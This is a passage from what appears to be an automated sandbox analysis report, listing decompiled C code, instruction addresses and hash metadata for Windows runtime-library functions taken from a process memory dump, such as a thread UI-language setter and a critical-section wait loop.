						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x13b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E012D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E012D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01368938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E012CB150();
													}
													_t116 = E01366D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E012D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x13b8638; // 0x0
																	_t122 = L012D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E012D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E012D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L012FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L012D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E012FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E012FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E012FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E012FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E012FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x13b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x13b7b84 = _t75;
						_t73 = E012DEB70(_t134, 0x13b7b60);
						if( *0x13b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E012DFF60( *0x13b7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                            0x012ffab0
                                                            0x012ffab2
                                                            0x012ffab3
                                                            0x012ffab4
                                                            0x012ffabc
                                                            0x012ffac0
                                                            0x012ffb14
                                                            0x012ffb17
                                                            0x012ffac2
                                                            0x012ffac8
                                                            0x012ffacd
                                                            0x012ffad3
                                                            0x012ffad3
                                                            0x012ffadd
                                                            0x012ffb18
                                                            0x012ffb1b
                                                            0x012ffb1d
                                                            0x012ffb1e
                                                            0x012ffb1f
                                                            0x012ffb20
                                                            0x012ffb21
                                                            0x012ffb22
                                                            0x012ffb23
                                                            0x012ffb24
                                                            0x012ffb25
                                                            0x012ffb26
                                                            0x012ffb27
                                                            0x012ffb28
                                                            0x012ffb29
                                                            0x012ffb2a
                                                            0x012ffb2b
                                                            0x012ffb2c
                                                            0x012ffb2d
                                                            0x012ffb2e
                                                            0x012ffb2f
                                                            0x012ffb3a
                                                            0x012ffb3b
                                                            0x012ffb3e
                                                            0x012ffb41
                                                            0x012ffb44
                                                            0x012ffb47
                                                            0x012ffb4a
                                                            0x012ffb4d
                                                            0x012ffb53
                                                            0x0133bdcb
                                                            0x0133bdcb
                                                            0x012ffb59
                                                            0x012ffb5b
                                                            0x012ffb5b
                                                            0x012ffb5e
                                                            0x0133bdd5
                                                            0x0133bdd8
                                                            0x00000000
                                                            0x0133bdda
                                                            0x00000000
                                                            0x0133bdda
                                                            0x012ffb64
                                                            0x012ffb64
                                                            0x012ffb64
                                                            0x012ffb67
                                                            0x012ffb6e
                                                            0x012ffb70
                                                            0x012ffb72
                                                            0x00000000
                                                            0x012ffb78
                                                            0x012ffb7a
                                                            0x012ffb7a
                                                            0x012ffb7d
                                                            0x012ffb80
                                                            0x0133bddf
                                                            0x0133bde1
                                                            0x00000000
                                                            0x0133bde3
                                                            0x00000000
                                                            0x0133bde3
                                                            0x012ffb86
                                                            0x012ffb86
                                                            0x012ffb86
                                                            0x012ffb8b
                                                            0x012ffb90
                                                            0x012ffb92
                                                            0x012ffb94
                                                            0x012ffb9a
                                                            0x012ffb9b
                                                            0x012ffba1
                                                            0x0133bde8
                                                            0x0133bdeb
                                                            0x0133bded
                                                            0x0133beb5
                                                            0x0133beb5
                                                            0x0133bebb
                                                            0x0133bebd
                                                            0x0133bec3
                                                            0x0133bed2
                                                            0x0133bedd
                                                            0x0133bedd
                                                            0x0133beed
                                                            0x00000000
                                                            0x0133bdf3
                                                            0x0133bdfe
                                                            0x0133be06
                                                            0x0133be0b
                                                            0x0133be0d
                                                            0x0133be0f
                                                            0x0133be14
                                                            0x0133be19
                                                            0x0133be20
                                                            0x0133be25
                                                            0x0133be27
                                                            0x0133be35
                                                            0x0133be39
                                                            0x0133be46
                                                            0x0133be4f
                                                            0x0133be54
                                                            0x0133be56
                                                            0x0133bef8
                                                            0x0133bef8
                                                            0x00000000
                                                            0x0133be5c
                                                            0x0133be5c
                                                            0x0133be60
                                                            0x00000000
                                                            0x0133be66
                                                            0x0133be66
                                                            0x0133be7f
                                                            0x0133be84
                                                            0x0133be87
                                                            0x0133be89
                                                            0x0133be8b
                                                            0x0133be99
                                                            0x0133be9d
                                                            0x0133bea0
                                                            0x0133beac
                                                            0x0133beaf
                                                            0x0133beb1
                                                            0x0133beb3
                                                            0x0133beb3
                                                            0x00000000
                                                            0x0133bea2
                                                            0x0133bea2
                                                            0x00000000
                                                            0x0133bea2
                                                            0x0133be8d
                                                            0x0133be8d
                                                            0x0133be92
                                                            0x00000000
                                                            0x0133be92
                                                            0x0133be8b
                                                            0x0133be60
                                                            0x0133be3b
                                                            0x0133be3b
                                                            0x0133be3e
                                                            0x00000000
                                                            0x0133be40
                                                            0x0133be40
                                                            0x0133be44
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0133be44
                                                            0x0133be3e
                                                            0x0133be29
                                                            0x0133be29
                                                            0x00000000
                                                            0x0133be29
                                                            0x0133be27
                                                            0x00000000
                                                            0x012ffba7
                                                            0x012ffba7
                                                            0x012ffbab
                                                            0x0133bf02
                                                            0x012ffbb1
                                                            0x012ffbb1
                                                            0x012ffbb8
                                                            0x012ffbbd
                                                            0x012ffbbd
                                                            0x012ffbbf
                                                            0x012ffbbf
                                                            0x012ffbc5
                                                            0x012ffbcb
                                                            0x012ffbf8
                                                            0x012ffbf8
                                                            0x012ffbfa
                                                            0x00000000
                                                            0x012ffc00
                                                            0x012ffc00
                                                            0x012ffc03
                                                            0x00000000
                                                            0x012ffc09
                                                            0x012ffc09
                                                            0x012ffc0f
                                                            0x012ffc15
                                                            0x012ffc23
                                                            0x012ffc23
                                                            0x012ffc25
                                                            0x012ffc27
                                                            0x012ffc75
                                                            0x012ffc7c
                                                            0x012ffc84
                                                            0x00000000
                                                            0x012ffc29
                                                            0x012ffc29
                                                            0x012ffc2d
                                                            0x012ffc30
                                                            0x0133bf0f
                                                            0x00000000
                                                            0x012ffc36
                                                            0x012ffc38
                                                            0x012ffc3b
                                                            0x012ffc41
                                                            0x0133bf17
                                                            0x0133bf19
                                                            0x0133bf48
                                                            0x0133bf4b
                                                            0x00000000
                                                            0x0133bf1b
                                                            0x0133bf22
                                                            0x0133bf24
                                                            0x0133bf26
                                                            0x00000000
                                                            0x0133bf2c
                                                            0x0133bf37
                                                            0x0133bf39
                                                            0x0133bf3b
                                                            0x00000000
                                                            0x0133bf41
                                                            0x0133bf41
                                                            0x0133bf41
                                                            0x0133bf41
                                                            0x0133bf45
                                                            0x00000000
                                                            0x0133bf45
                                                            0x0133bf3b
                                                            0x0133bf26
                                                            0x00000000
                                                            0x012ffc47
                                                            0x012ffc47
                                                            0x012ffc49
                                                            0x012ffcb2
                                                            0x012ffcb4
                                                            0x012ffcb6
                                                            0x012ffcdc
                                                            0x012ffcdc
                                                            0x00000000
                                                            0x012ffcb8
                                                            0x012ffcc3
                                                            0x012ffcc5
                                                            0x012ffcc7
                                                            0x00000000
                                                            0x012ffcc9
                                                            0x012ffcc9
                                                            0x012ffccd
                                                            0x00000000
                                                            0x012ffccd
                                                            0x012ffcc7
                                                            0x00000000
                                                            0x012ffc4b
                                                            0x012ffc4b
                                                            0x012ffc4e
                                                            0x012ffc4e
                                                            0x012ffc51
                                                            0x012ffc51
                                                            0x012ffc54
                                                            0x012ffc5a
                                                            0x012ffc5c
                                                            0x012ffc5f
                                                            0x012ffc61
                                                            0x012ffc63
                                                            0x012ffc65
                                                            0x012ffc67
                                                            0x012ffc6e
                                                            0x012ffc72
                                                            0x012ffc72
                                                            0x012ffc72
                                                            0x012ffc72
                                                            0x012ffc67
                                                            0x012ffc61
                                                            0x00000000
                                                            0x012ffc5a
                                                            0x012ffc49
                                                            0x012ffc41
                                                            0x012ffc30
                                                            0x012ffc27
                                                            0x012ffc03
                                                            0x012ffbcd
                                                            0x012ffbd3
                                                            0x012ffbd9
                                                            0x012ffbdc
                                                            0x012ffbde
                                                            0x012ffc99
                                                            0x012ffc9b
                                                            0x012ffc9d
                                                            0x012ffcd5
                                                            0x012ffcd5
                                                            0x012ffc89
                                                            0x012ffc89
                                                            0x00000000
                                                            0x012ffc9f
                                                            0x012ffc9f
                                                            0x012ffca3
                                                            0x00000000
                                                            0x012ffca3
                                                            0x00000000
                                                            0x012ffbe4
                                                            0x012ffbe4
                                                            0x012ffbe4
                                                            0x012ffbe4
                                                            0x012ffbe9
                                                            0x012ffbf2
                                                            0x00000000
                                                            0x012ffbf2
                                                            0x012ffbde
                                                            0x012ffbcb
                                                            0x012ffbab
                                                            0x012ffc8b
                                                            0x012ffc8b
                                                            0x012ffc8c
                                                            0x012ffb80
                                                            0x012ffb72
                                                            0x012ffb5e
                                                            0x012ffc8d
                                                            0x012ffc91
                                                            0x012ffadf
                                                            0x012ffadf
                                                            0x012ffae1
                                                            0x012ffae4
                                                            0x012ffae7
                                                            0x012ffaec
                                                            0x012ffaf8
                                                            0x012ffb00
                                                            0x012ffb07
                                                            0x012ffb0f
                                                            0x012ffb0f
                                                            0x012ffb07
                                                            0x00000000
                                                            0x012ffaf8
                                                            0x012ffadd

                                                            Strings
                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0133BE0F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                            • API String ID: 0-865735534
                                                            • Opcode ID: d725692eaaf748019d6587c5a822b3d2403343c6a4b6e6f6544a1386e5f30b6f
                                                            • Instruction ID: cc48afb8e6f4adba6078d5cd3620f267142639f26746fd9da5d57fa5fc340ba5
                                                            • Opcode Fuzzy Hash: d725692eaaf748019d6587c5a822b3d2403343c6a4b6e6f6544a1386e5f30b6f
                                                            • Instruction Fuzzy Hash: A9A11372B206168BEB25CF6CC590B7AF7A4AF88714F04457DEB06CB694EB74D841CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E012C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x13b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x13b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E013097C0();
				}
				if( *0x13b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x13b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E012F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E012E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0135FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01309520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E012FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0131DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x13b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x13b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01309980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E013095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E012E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E012E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01347016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0135FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x13b5350;
							if(_t109 != 0x13b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0135FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01355720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                            0x012c2d8a
                                                            0x012c2d8a
                                                            0x012c2d92
                                                            0x012c2d96
                                                            0x012c2d9e
                                                            0x012c2da0
                                                            0x012c2da3
                                                            0x012c2da5
                                                            0x012c2da8
                                                            0x012c2dab
                                                            0x012c2db2
                                                            0x0131f9aa
                                                            0x0131f9ab
                                                            0x0131f9ae
                                                            0x0131f9ae
                                                            0x012c2db8
                                                            0x012c2dc2
                                                            0x0131f9b9
                                                            0x0131f9be
                                                            0x0131f9bf
                                                            0x0131f9bf
                                                            0x012c2dcf
                                                            0x0131f9c9
                                                            0x012c2dd5
                                                            0x012c2dd5
                                                            0x012c2dd5
                                                            0x012c2dde
                                                            0x012c2de1
                                                            0x012c2e70
                                                            0x012c2e72
                                                            0x012c2e72
                                                            0x012c2de7
                                                            0x012c2deb
                                                            0x012c2e7c
                                                            0x012c2e83
                                                            0x012c2e85
                                                            0x012c2e8b
                                                            0x012c2e8d
                                                            0x012c2e92
                                                            0x012c2e92
                                                            0x012c2e85
                                                            0x012c2df1
                                                            0x012c2df7
                                                            0x012c2df9
                                                            0x012c2df9
                                                            0x012c2dfc
                                                            0x012c2dff
                                                            0x012c2e02
                                                            0x00000000
                                                            0x012c2e05
                                                            0x012c2e0c
                                                            0x0131f9d9
                                                            0x012c2e12
                                                            0x012c2e12
                                                            0x012c2e12
                                                            0x012c2e1a
                                                            0x0131f9e3
                                                            0x0131f9e9
                                                            0x0131f9f0
                                                            0x0131f9f6
                                                            0x0131f9f8
                                                            0x0131f9f8
                                                            0x0131f9f0
                                                            0x012c2e23
                                                            0x0131fa02
                                                            0x0131fa03
                                                            0x0131fa05
                                                            0x0131fa06
                                                            0x00000000
                                                            0x012c2e29
                                                            0x012c2e29
                                                            0x012c2e2e
                                                            0x012c2e34
                                                            0x012c2e3e
                                                            0x00000000
                                                            0x00000000
                                                            0x012c2e44
                                                            0x012c2e47
                                                            0x012c2e4d
                                                            0x00000000
                                                            0x00000000
                                                            0x012c2e4f
                                                            0x012c2e54
                                                            0x00000000
                                                            0x00000000
                                                            0x012c2e5a
                                                            0x012c2e5f
                                                            0x012c2e9a
                                                            0x012c2ea4
                                                            0x012c2ea5
                                                            0x012c2ea8
                                                            0x012c2eaf
                                                            0x012c2eb2
                                                            0x012c2eb5
                                                            0x0131fae9
                                                            0x0131faeb
                                                            0x0131faed
                                                            0x0131faef
                                                            0x0131faf7
                                                            0x0131faf8
                                                            0x0131fafd
                                                            0x0131faff
                                                            0x0131fb04
                                                            0x0131fb04
                                                            0x0131faff
                                                            0x012c2ec0
                                                            0x012c2ec4
                                                            0x012c2ec6
                                                            0x012c2ec8
                                                            0x0131fb14
                                                            0x0131fb18
                                                            0x0131fb1e
                                                            0x0131fb21
                                                            0x0131fb21
                                                            0x012c2ece
                                                            0x012c2ece
                                                            0x012c2ece
                                                            0x012c2ed7
                                                            0x012c2e61
                                                            0x012c2e63
                                                            0x0131fa6b
                                                            0x0131fa71
                                                            0x0131fa76
                                                            0x0131fa78
                                                            0x0131fa8a
                                                            0x0131fa7a
                                                            0x0131fa83
                                                            0x0131fa83
                                                            0x0131fa8f
                                                            0x0131fa91
                                                            0x0131fa97
                                                            0x0131fa9d
                                                            0x0131faa4
                                                            0x0131faaa
                                                            0x0131faaf
                                                            0x0131fab1
                                                            0x0131fac3
                                                            0x0131fab3
                                                            0x0131fabc
                                                            0x0131fabc
                                                            0x0131fac8
                                                            0x0131facb
                                                            0x0131fadf
                                                            0x0131fadf
                                                            0x0131facb
                                                            0x0131faa4
                                                            0x0131fa91
                                                            0x012c2e6f
                                                            0x012c2e6f
                                                            0x012c2e5f
                                                            0x0131fa13
                                                            0x0131fa15
                                                            0x0131fa17
                                                            0x0131fa1f
                                                            0x0131fa21
                                                            0x0131fa22
                                                            0x0131fa25
                                                            0x0131fa28
                                                            0x0131fa2f
                                                            0x0131fa2f
                                                            0x0131fa2a
                                                            0x0131fa2a
                                                            0x0131fa2a
                                                            0x0131fa31
                                                            0x0131fa34
                                                            0x0131fa36
                                                            0x0131fa3c
                                                            0x0131fa3e
                                                            0x0131fa41
                                                            0x0131fa43
                                                            0x0131fa45
                                                            0x0131fa45
                                                            0x0131fa41
                                                            0x0131fa3c
                                                            0x0131fa4a
                                                            0x0131fa4f
                                                            0x0131fa51
                                                            0x0131fa53
                                                            0x0131fa56
                                                            0x0131fa5b
                                                            0x0131fa5e
                                                            0x00000000
                                                            0x0131fa5e
                                                            0x012c2e23

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Re-Waiting
                                                            • API String ID: 0-316354757
                                                            • Opcode ID: a2954b68b5ab7a998fea85d757a3bc11db7f36a9f7eca6caea0359944fbb2594
                                                            • Instruction ID: 9c65ecb2e4eae6f6433078a764e743ad6f6e8d3614b5b132e783fa85b6ca4bbd
                                                            • Opcode Fuzzy Hash: a2954b68b5ab7a998fea85d757a3bc11db7f36a9f7eca6caea0359944fbb2594
                                                            • Instruction Fuzzy Hash: AB613731A10645DFEB36DF6CC880B7E7BE9EB44B18F140269DB15A72C1CB74A905CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01390EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E01390EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0138FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01391074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01309730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0138A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0138A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x13b8b04 >> 0x14) + (_v44 -  *0x13b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E012E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
